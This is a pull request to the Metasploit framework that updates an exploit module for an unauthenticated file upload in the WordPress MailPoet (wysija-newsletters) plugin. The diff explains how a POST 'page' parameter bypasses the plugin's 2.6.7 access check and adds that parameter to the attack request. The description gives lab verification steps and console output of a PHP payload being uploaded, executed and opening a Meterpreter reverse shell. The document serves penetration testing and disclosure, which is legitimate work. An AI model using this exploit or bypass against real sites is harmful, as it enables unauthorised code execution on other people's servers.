### PR TITLE
Updated Mailpoet exploit

### DIFF
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -15,11 +15,16 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload',
       'Description'    => %q{
-          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.7
+          The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
           is vulnerable to an unauthenticated file upload. The exploit uses the Upload Theme
           functionality to upload a zip file containing the payload. The plugin used the
           admin_init hook, which is also executed for unauthenticated users when accessing
-          a specific URL.
+          a specific URL. The developers tried to fix the vulnerablility
+          in version 2.6.7 but the fix can be bypassed. In PHPs default configuration,
+          a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
+          uses $_REQUEST to check for access rights. By setting the POST parameter to
+          something not beginning with 'wysija_', the check is bypassed. Wordpress uses
+          the $_GET array to determine the page and is so not affected by this.
       },
       'Author'         =>
         [
@@ -29,12 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ]
+          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
+          [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
+          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [ ['wysija-newsletters < 2.6.7', {}] ],
+      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 1 2014'))
   end
@@ -81,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Found version #{version} of the plugin")
 
-    if Gem::Version.new(version) < Gem::Version.new('2.6.7')
+    if Gem::Version.new(version) < Gem::Version.new('2.6.8')
       return Msf::Exploit::CheckCode::Appears
     else
       return Msf::Exploit::CheckCode::Safe
@@ -101,6 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
     data.add_part('themeupload', nil, nil, 'form-data; name="action"')
     data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
     post_data = data.to_s
 
     payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)


### PR DESCRIPTION
The fix in version 2.6.7 was not correct so it's possible to exploit the vuln in 2.6.7 too. It was correctly fixed in version 2.6.8 (see links for details).

Old PR:https://github.com/rapid7/metasploit-framework/pull/3487
### Steps to verify
- [x] Install Wordpress (https://www.firefart.at/how-to-install-wordpress/)
- [x] Download the vulnerable version http://downloads.wordpress.org/plugin/wysija-newsletters.2.6.7.zip
- [x] Open the Admin Interface --> Plugin --> Add new --> Upload
- [x] Upload 2.6.7
- [x] Activate the Plugin
- [x] Run the exploit
- [x] Open Admin Interface and remove the Plugin
- [x] Verify 2.6.6 works (upload zip): http://downloads.wordpress.org/plugin/wysija-newsletters.2.6.6.zip
- [x] Run the exploit again
### Output

```
firefart@mint ~/coding/metasploit-framework $ ./msfcli exploit/unix/webapp/wp_wysija_newsletters_upload RHOST=192.168.126.164 C
[*] Initializing modules...
[*] 192.168.126.164:80 - Found version 2.6.7 of the plugin
[*] The target appears to be vulnerable.


firefart@mint ~/coding/metasploit-framework $ ./msfcli exploit/unix/webapp/wp_wysija_newsletters_upload RHOST=192.168.126.164 E
[*] Initializing modules...
RHOST => 192.168.126.164
[*] Started reverse handler on 192.168.126.128:4444 
[*] 192.168.126.164:80 - Uploading payload to /wp-content/uploads/wysija/themes/SQPBkiXgFS/LFdDdgADVo.php
[!] 192.168.126.164:80 - The theme folder SQPBkiXgFS can not be removed. Please delete it manually.
[*] 192.168.126.164:80 - Executing payload /wp-content/uploads/wysija/themes/SQPBkiXgFS/LFdDdgADVo.php
[*] Sending stage (40063 bytes) to 192.168.126.164
[*] Meterpreter session 1 opened (192.168.126.128:4444 -> 192.168.126.164:60558) at 2014-07-06 10:50:29 +0200
[+] Deleted style.css
[+] Deleted LFdDdgADVo.php

meterpreter > sysinfo
Computer    : wordpress
OS          : Linux wordpress 3.13.0-30-generic #54-Ubuntu SMP Mon Jun 9 22:45:01 UTC 2014 x86_64
Meterpreter : php/php
meterpreter > shell
Process 1476 created.
Channel 0 created.
grep -i "stable tag" /var/www/wordpress/wp-content/plugins/wysija-newsletters/readme.txt
Stable tag: 2.6.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.126.164 - Meterpreter session 1 closed.  Reason: User exit
```

CC @brandonprry @jvazquez-r7 maybe you haven't removed your test systems yet ;)
